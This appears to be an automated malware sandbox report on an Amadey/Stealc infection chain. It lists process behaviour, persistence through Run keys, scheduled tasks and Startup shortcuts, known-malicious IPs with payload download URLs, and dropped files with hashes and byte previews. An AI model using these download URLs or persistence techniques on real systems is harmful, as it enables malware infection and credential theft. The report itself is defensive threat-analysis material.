Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Skipping network analysis since amount of network traffic is too extensive

Simulations

Behavior and APIs

Time	Type	Description
01:23:03	API Interceptor	29393x Sleep call for process: axplong.exe modified
01:23:06	API Interceptor	1x Sleep call for process: MpCmdRun.exe modified
01:23:28	API Interceptor	11x Sleep call for process: new_v8.exe modified
01:23:34	API Interceptor	2x Sleep call for process: svchost.exe modified
01:23:35	API Interceptor	3032x Sleep call for process: Jurisdiction.pif modified
01:23:45	API Interceptor	3008x Sleep call for process: 550b7cfe5f.exe modified
05:02:19	Task Scheduler	Run new task: axplong path: C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe
06:23:36	Task Scheduler	Run new task: Wall path: wscript s>//B "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js"
06:23:36	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoCraft.url
06:24:07	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LgAmARwZ.url
06:24:27	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run c8908bf20d.exe C:\Users\user~1\AppData\Local\Temp\1001471001\c8908bf20d.exe
06:24:41	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 2dc588f7b5.exe C:\Users\user~1\AppData\Local\Temp\1001472001\2dc588f7b5.exe
06:24:52	Task Scheduler	Run new task: skotes path: C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe
06:24:59	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run c8908bf20d.exe C:\Users\user~1\AppData\Local\Temp\1001471001\c8908bf20d.exe
06:25:17	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 2dc588f7b5.exe C:\Users\user~1\AppData\Local\Temp\1001472001\2dc588f7b5.exe
06:26:06	Task Scheduler	Run new task: ServiceData4 path: C:\Users\user~1\AppData\Local\Temp\/service123.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
1.1.1.1	PO-230821_pdf.exe	Get hash	malicious	FormBook, NSISDropper	Browse	www.974dp.com/sn26/?kJBLpb8=qaEGeuQorcUQurUZCuE8d9pas+Z0M0brqtX248JBolEfq8j8F1R9i1jKZexhxY54UlRG&ML0tl=NZlpi
	AFfv8HpACF.exe	Get hash	malicious	Unknown	Browse	1.1.1.1/
	INVOICE_90990_PDF.exe	Get hash	malicious	FormBook	Browse	www.quranvisor.com/usvr/?mN9d3vF=HHrW7cA9N4YJlebHFvlsdlDciSnnaQItEG8Ccfxp291VjnjcuwoPACt7EOqEq4SWjIf8&Pjf81=-Zdd-V5hqhM4p2S
	Go.exe	Get hash	malicious	Unknown	Browse	1.1.1.1/
185.215.113.36	5GP8oxUsvj.exe	Get hash	malicious	Unknown	Browse	185.215.113.36/zenaaaretest/CPU.zip
185.215.113.36	SecuriteInfo.com.generic.ml.7966.exe	Get hash	malicious	Amadey RedLine	Browse	185.215.113.36/DebasedSeptenary_2021-09-29_00-21.exe
20.101.57.9	ALVARA-072.msi	Get hash	malicious	AteraAgent	Browse
	TRABALHO----PROCESSO0014S55-S440000000S1.msi	Get hash	malicious	AteraAgent	Browse
	SecuriteInfo.com.Program.RemoteAdminNET.1.367.20003.msi	Get hash	malicious	AteraAgent	Browse
	LisectAVT_2403002C_44.exe	Get hash	malicious	EICAR	Browse
	BraveBrowserSetup-BRV030.exe	Get hash	malicious	Unknown	Browse
	lgX7lgUL1w.exe	Get hash	malicious	Neoreklami, PureLog Stealer, SmokeLoader	Browse
185.215.113.16	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.16/mine/random.exe
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.16/mine/random.exe
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.16/mine/random.exe
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.16/mine/random.exe
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.16/mine/random.exe
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.16/off/def.exe
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.16/mine/random.exe
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.16/mine/random.exe
	ykDoK8BtxW.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.16/steam/random.exe
	file.exe	Get hash	malicious	LummaC	Browse	185.215.113.16/mine/random.exe

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	188.114.96.3
	2Lzx7LMDWV.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	https://my-homepagero.sa.com/exml/	Get hash	malicious	HTMLPhisher	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	188.114.97.3
	NF_Payment_Ref_FAN930276.exe	Get hash	malicious	FormBook	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	188.114.96.3
	FW CMA SHZ Freight invoice CHN1080769.exe	Get hash	malicious	FormBook	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	188.114.96.3
	https://pdfhost.io/v/maTYQa.jg_mqfilserawxgxdgxhhgsx_1	Get hash	malicious	Unknown	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	188.114.96.3
VMAGE-ASRU	http://rt.authses.online	Get hash	malicious	Unknown	Browse	45.148.244.222
	file.exe	Get hash	malicious	RDPWrap Tool, Amadey, Socks5Systemz, Stealc, Vidar, Xmrig	Browse	194.116.215.195
	Report-41952.lnk	Get hash	malicious	Unknown	Browse	193.242.145.138
	nJohIBtNm5.exe	Get hash	malicious	LummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, RedLine	Browse	194.116.215.195
	file.exe	Get hash	malicious	LummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Stealc	Browse	194.116.215.195
	file.exe	Get hash	malicious	LummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Socks5Systemz	Browse	194.116.215.195
	file.exe	Get hash	malicious	LummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer	Browse	194.116.215.195
	file.exe	Get hash	malicious	Amadey, CryptOne, PureLog Stealer, RedLine, Stealc, Vidar, Zhark RAT	Browse	194.116.215.195
	file.exe	Get hash	malicious	Amadey, PureLog Stealer, RedLine, Stealc, zgRAT	Browse	194.116.215.195
	jD6b7MZOhT.exe	Get hash	malicious	Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer, RedLine	Browse	194.116.215.195
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.206
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.16
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.215.113.206
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.206

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	oZ7nac01Em.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	WGo3ga1AL9.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
C:\ProgramData\LgAmARwZ\Application.exe	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RedLine, Stealc, Vidar	Browse

Created / dropped Files

C:\ProgramData\BGCAFHCAKFBFIECAFIIJ

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	ASCII text, with very long lines (1769), with CRLF line terminators
Category:	modified
Size (bytes):	9370
Entropy (8bit):	5.514140640374404
Encrypted:	false
SSDEEP:	192:lLnSRkPYbBp6tqUCaXr6V6kHNBw8D3nSl:NeqqUWpPwK0
MD5:	7E44458E0A8A3A7D10875BC3B7AE72D1
SHA1:	E5E6AC8676EE3761DAB13A10EB7573C19F48D297
SHA-256:	21A04E176A9CEBDA60AE6FD82A7495C6E0867ED02B8009A44DDC9863E14D8753
SHA-512:	012ED6CDC0802AA1063EFE841549341CC86EB626A26FC4BDC509598D8E33093296510344A2CC4419B007F6191F3445DA8F0AAE3B1626E54C1EF66DDDF3FA59B1
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "27fb6245-bd08-4de6-8f4d-2ece3f597752");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696491690);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696491694);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\DAFBGHCAKKFCAKEBKJKK

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DBKFIDAA

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1215420383712111
Encrypted:	false
SSDEEP:	384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
MD5:	9A809AD8B1FDDA60760BB6253358A1DB
SHA1:	D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
SHA-256:	95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
SHA-512:	2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DBKFIDAAEHIEGCBFIDBFHCGDAK

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.848598812124929
Encrypted:	false
SSDEEP:	24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fBODYfOg1ZAJFF0DiUhQ5de5SjhXE1:ThFawNLopFgU10XJBODqzqFF0DYde5P
MD5:	9664DAA86F8917816B588C715D97BE07
SHA1:	FAD9771763CD861ED8F3A57004C4B371422B7761
SHA-256:	8FED359D88F0588829BA60D236269B2528742F7F66DF3ACF22B32B8F883FE785
SHA-512:	E551D5CC3D5709EE00F85BB92A25DDC96112A4357DFEA3D859559D47DB30FEBD2FD36BDFA2BEC6DCA63D3E233996E9FCD2237F92CEE5B32BA8D7F2E1913B2DA9
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\FIDHCFBAKFBGDGDHJKJJEGIDAA

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\FIIJJKKFHIEHJKECGCGC

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HIJEGDBG

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.137181696973627
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
MD5:	2D903A087A0C793BDB82F6426B1E8EFB
SHA1:	E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
SHA-256:	AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
SHA-512:	90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\HIJEGDBGDBFIJKECBAKFBFIDGC

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\JEBFIIIEHCFHJKFHDHDAAFBGDB

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.03786218306281921
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWB2IGKhNbxrO3Dpvu2HI:58r54w0VW3xWB2ohFQ3Y2
MD5:	4BB4A37B8E93E9B0F5D3DF275799D45E
SHA1:	E27DF7CC49B0D145140C119A99C1BBAA9ECCE8F7
SHA-256:	89BC0F21671C244C40A9EA42893B508858AD6E1E26AC16F2BD507C3E8CBB3CF7
SHA-512:	F2FC9067EF11DC3B719507B97C76A19B9E976D143A2FD11474B8D2A2848A706AFCA316A95FEEBA644099497A95E1C426CDAB923D5A70619018E1543FEF3182DB
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\LgAmARwZ\Application.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	526848
Entropy (8bit):	7.806472978332927
Encrypted:	false
SSDEEP:	12288:NL07gVkGXreL4LV8wdljMagCkqZBtzPmmhwAoXC+YF:Nw7g6GXrnFkm1PmmBqC+YF
MD5:	26D8D52BAC8F4615861F39E118EFA28D
SHA1:	EFD5A7CCD128FFE280AF75EC8B3E465C989D9E35
SHA-256:	8521A1F4D523A2A9E7F8DDF01147E65E7F3FF54B268E9B40F91E07DC01FA148F
SHA-512:	1911A21D654E317FBA50308007BB9D56FBA2C19A545EF6DFAADE17821B0F8FC48AA041C8A4A0339BEE61CBD429852D561985E27C574ECED716B2E937AFA18733
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 50%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....E..........."...0.................. ... ....@.. .......................`............@.....................................O.... ..L....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc...L.... ......................@..@.reloc.......@......................@..B........................H........(...............>..............................................6.(.....(....z.,..{....,..{....o......(........0...........s....}.....s....}.....s....}.....s....}.....s....}.....s....}......{....s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s....}......{....s....}.....s....}.....s ...}.....s!...}.....("....{.... .....Ws#...o$....{....r...po%....{.... ......s&...o'....{.....o(....{.... (... ....s#...o$....{....r...po%....{.... ......s&...o'....{..

C:\ProgramData\Microsoft\Network\Downloader\edb.log

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.7067044977496362
Encrypted:	false
SSDEEP:	1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6Vqa:2JIB/wUKUKQncEmYRTwh0O
MD5:	479BACA7F6287D1A532DA62F32D0BAEA
SHA1:	030D6218A1B83E4FA289ACC3992AF25154262EA8
SHA-256:	91D2CD05E82227EE9EE73DA0C6CE7F9753BE9CD833A50DD96272C768E5A19A29
SHA-512:	43193AAE54ED72A3CD9C76D17ECC6C5DD2BAE46FCC42AF0C3D786830F67CD863D631C596CB969FE34B1E9D345D1A95AEEBD8919D2AAEA4CD53E6E5CE2527919E
Malicious:	false
Preview:	...........@..@.+...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................u.f!.Lz3.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x859d285a, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.7900035162684308
Encrypted:	false
SSDEEP:	1536:DSB2ESB2SSjlK/JvED2y0IEWBqbMo5g5FYkr3g16k42UPkLk+kq+UJ8xUJoU+dzV:DazaPvgurTd42UgSii
MD5:	196CDE1E96CDDCB3C2D5CB090E9AC84D
SHA1:	92C40D46425366B0B22BBE32A7A6E8E9CB524C64
SHA-256:	17A7C754507FEC463D3D07DFA33E19EE97E744801D6D1D51C7167F9415B54CCB
SHA-512:	A0B14703CF07E02A53D5EB4FD5C5D757242C51EC2781722624FA7A667175F2C6ED52C8EE99A2CCE8B58FC48D73F591E3948993869926FFA778B244C6A5AF8F07
Malicious:	false
Preview:	..(Z... ...............X\...;...{......................0.`.....42...{5."....\|..h.b.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........+...{...............................................................................................................................................................................................2...{...................................4Dr"....\|...................V@("....\|...........................#......h.b.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.08194852548081169
Encrypted:	false
SSDEEP:	3:UMl/EYewIuZstRygGqt/57Dek3JMXstltlallEqW3l/TjzzQ/t:UMl/EzBuStRygHR3tztltAmd8/
MD5:	F6E38635E8D272B862257E4A54DBB450
SHA1:	DA9AEB32CFD66F03E699C37C8038AA65DD81A6F4
SHA-256:	FB0E3B015E266A63E52D0D53E0CFEABB603BB83F350515998E8758A10A7518E2
SHA-512:	970E80CDC33E436DFAA1F250A313DE103C6430D3B0331874BA7365A9CE533025E668FF0A8D58AC3D6C385823E37090C3A3EF35A3C22B234C56249F8BA5B6D7B5
Malicious:	false
Preview:	.p.S.....................................;...{.."....\|..42...{5.........42...{5.42...{5...Y.42...{59.................V@("....\|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\ClipSVC\tokens.dat

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	697182
Entropy (8bit):	5.235404019605756
Encrypted:	false
SSDEEP:	12288:3BXiKZWAAllNJheaP7Qata8PtcV3w6F6BM/vWjfLDxqq6A+kmfDUhbpEj2DDp010:V+
MD5:	2C2526C77A837733638AFFC95875AFAF
SHA1:	0037979EA218CA810E304B1AD3C7D6DD10087D06
SHA-256:	4EC6CA07A541564B4CC5EBB43A07FA270004550A08685058D56BA90700A2EB7D
SHA-512:	056B57BA9D54FFC6C55649E728148EB2AF6D4154BB13570BB8DBAA6FA0EDE6B0E179220FA93F27B758DECE67A461D4784A6F29B5AB7C4A1B07A6BF7958A19E35
Malicious:	false
Preview:	....w..B6Tj....X.s.TEe....1aL.&.?..$......,...................4.c.3.a.4.c.b.8.-.a.c.b.f.-.1.9.f.a.-.d.1.7.6.-.d.1.a.a.0.c.9.f.b.9.e.6._...e.t...................................................x.m.l..................z...9.1.a.5.b.4.c.7.-.2.9.a.8.-.e.c.8.0.-.4.3.2.1.-.f.b.e.c.e.a.9.0.6.7.0.5._.t.r.k...................................................x.m.l...h.......h...........f.d.2.d.4.f.f.f.-.b.a.2.c.-.9.3.c.6.-.8.8.b.9.-.8.7.1.8.4.3.d.d.1.9.e.9._.........................................................x.m.l...........@...........e.8.f.f.f.2.d.f.-.6.0.4.1.-.8.f.2.1.-.3.d.f.7.-.d.b.3.1.6.6.1.a.a.0.9.b._.m.e.t...................................................x.m.l...........h.......t...e.8.f.f.f.2.d.f.-.6.0.4.1.-.8.f.2.1.-.3.d.f.7.-.d.b.3.1.6.6.1.a.a.0.9.b._.t.r.k...................................................x.m.l...B...................1.8.8.0.0.6.f.c.-.d.8.8.5.-.b.0.c.b.-.e.4.8.c.-.f.1.c.4.e.d.6.0.a.2.b.6._.........................................................x.m.l...........

C:\ProgramData\Microsoft\Windows\ClipSvc\tokens.dat.bak (copy)

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	697182
Entropy (8bit):	5.235404019605756
Encrypted:	false
SSDEEP:	12288:3BXiKZWAAllNJheaP7Qata8PtcV3w6F6BM/vWjfLDxqq6A+kmfDUhbpEj2DDp010:V+
MD5:	2C2526C77A837733638AFFC95875AFAF
SHA1:	0037979EA218CA810E304B1AD3C7D6DD10087D06
SHA-256:	4EC6CA07A541564B4CC5EBB43A07FA270004550A08685058D56BA90700A2EB7D
SHA-512:	056B57BA9D54FFC6C55649E728148EB2AF6D4154BB13570BB8DBAA6FA0EDE6B0E179220FA93F27B758DECE67A461D4784A6F29B5AB7C4A1B07A6BF7958A19E35
Malicious:	false
Preview:	....w..B6Tj....X.s.TEe....1aL.&.?..$......,...................4.c.3.a.4.c.b.8.-.a.c.b.f.-.1.9.f.a.-.d.1.7.6.-.d.1.a.a.0.c.9.f.b.9.e.6._...e.t...................................................x.m.l..................z...9.1.a.5.b.4.c.7.-.2.9.a.8.-.e.c.8.0.-.4.3.2.1.-.f.b.e.c.e.a.9.0.6.7.0.5._.t.r.k...................................................x.m.l...h.......h...........f.d.2.d.4.f.f.f.-.b.a.2.c.-.9.3.c.6.-.8.8.b.9.-.8.7.1.8.4.3.d.d.1.9.e.9._.........................................................x.m.l...........@...........e.8.f.f.f.2.d.f.-.6.0.4.1.-.8.f.2.1.-.3.d.f.7.-.d.b.3.1.6.6.1.a.a.0.9.b._.m.e.t...................................................x.m.l...........h.......t...e.8.f.f.f.2.d.f.-.6.0.4.1.-.8.f.2.1.-.3.d.f.7.-.d.b.3.1.6.6.1.a.a.0.9.b._.t.r.k...................................................x.m.l...B...................1.8.8.0.0.6.f.c.-.d.8.8.5.-.b.0.c.b.-.e.4.8.c.-.f.1.c.4.e.d.6.0.a.2.b.6._.........................................................x.m.l...........

C:\ProgramData\freebl3.dll

Download File

